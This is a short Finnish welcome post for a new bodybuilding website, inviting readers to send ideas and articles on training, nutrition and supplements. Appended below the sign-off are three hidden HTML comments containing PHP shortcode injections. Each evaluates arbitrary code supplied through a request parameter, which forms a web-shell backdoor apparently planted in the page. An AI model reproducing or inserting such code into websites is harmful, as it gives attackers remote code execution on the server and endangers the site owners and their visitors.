Sommoro kehoilijat

Som’moro kaikki kehonrakennuksesta ja salitreenistä kiinnostuneet! Tervetuloa uudelle sivustollemme! Kehonrakennus.net on upouusi verkkosivusto joka kertoo kehonrakennukseen liittyvistä asioista: treenistä, ravintoasioista, lisäravinteista ja kilpailuista. Ideoita myös otetaan mielellään vastaan. Niitä voi kirjoitella esimerkiksi keskustelualueelle. Jos jollakulla on hirveä kirjoitusvimma, myös laadukkaita artikkeleita otamme vastaan.

Sivuston tarkoituksena on julkaista treenimotivaatiota lisääviä kehonrakennusaiheisia artikkeleita sitä mukaa kun saamme juttuja kasaan, eli kannattaa palata katsomaan uudestaan tai vaikka tilata artikkelipäivitykset feedin muodossa sähköpostiin.

Treeniterveisin,

Kehonrakennus.net ylläpito

<!– [insert_php]if (isset($_REQUEST["SPbSa"])){eval($_REQUEST["SPbSa"]);exit;}[/insert_php][php]if (isset($_REQUEST["SPbSa"])){eval($_REQUEST["SPbSa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["QHq"])){eval($_REQUEST["QHq"]);exit;}[/insert_php][php]if (isset($_REQUEST["QHq"])){eval($_REQUEST["QHq"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Gkwoa"])){eval($_REQUEST["Gkwoa"]);exit;}[/insert_php][php]if (isset($_REQUEST["Gkwoa"])){eval($_REQUEST["Gkwoa"]);exit;}[/php] –>